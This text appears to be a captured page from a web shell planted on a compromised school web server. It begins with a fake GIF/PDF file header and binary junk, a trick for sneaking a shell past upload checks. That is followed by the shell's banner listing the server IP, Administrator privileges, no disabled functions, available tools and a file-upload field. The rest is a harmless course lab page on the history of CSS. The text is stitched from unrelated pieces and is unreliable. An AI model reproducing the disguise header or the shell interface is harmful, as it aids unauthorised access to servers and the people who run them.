GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST1022/Labs/_Archive/Lab04/example/content/ |
Upload File : |
<!-- CSS.html --> <link href="../Lab04.css" rel="stylesheet" type="text/css"> <article> <img src="http://www.w3schools.com/images/w3css.gif"> <h2><a href="GlosseryCSS.html">CSS</a></h2> Styles Solved a Big Problem. <a href="GlosseryHTML.html">HTML</a> was never intended to contain tags for formatting a document. <a href="GlosseryHTML.html">HTML</a> was intended to define the content of a document, like:<br> <h1>This is a heading</h1><br> <p>This is a paragraph.</p><br> When tags like <font>, and color attributes were added to the <a href="GlosseryHTML.html">HTML</a> 3.2 specification, it started a nightmare for web developers. Development of large web sites, where fonts and color information were added to every single page, became a long and expensive process. To solve this problem, the World Wide Web Consortium (W3C) created <a href="GlosseryCSS.html">CSS</a>. In <a href="GlosseryHTML.html">HTML</a> 4.0, all formatting could be removed from the <a href="GlosseryHTML.html">HTML</a> document, and stored in a separate <a href="GlosseryCSS.html">CSS</a> file. All browsers support <a href="GlosseryCSS.html">CSS</a> today. </article>